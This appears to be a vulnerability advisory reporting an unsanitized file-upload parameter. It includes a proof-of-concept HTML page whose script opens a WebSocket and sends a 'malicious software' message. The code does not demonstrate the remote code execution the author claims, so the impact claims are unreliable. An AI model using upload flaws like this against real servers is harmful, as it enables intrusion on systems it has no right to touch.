Description:
The parameter "fileupload" in type ID is vulnerable to File Upload and RCE attacks, it is not sanitized correctly. The attacker can upload a virus directly on the server by using this web vulnerability, and then he can execute it, this can be the end of this server depending on the scenario! In this case, I just uploaded a [WebSocket] connector - exploit.html to connect the server with my machine, this is so nasty. I am a Penetration Tester, not a stupid cracker! Thank you all!
STATUS: HIGH- Vulnerability
[+]Exploit execution:
https://pwnedhost.com/uploads/exploit.html
[+]Exploit:
<html>
<script>
(() => {
const ws = new WebSocket('ws://0.0.0.0:8080')
ws.onopen = () => {
console.log('ws opened on browser')
ws.send('hello, you are connected with malicious software.')
}
ws.onmessage = (message) => {
console.log(`message received ${message}`)
}
})()
</script>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation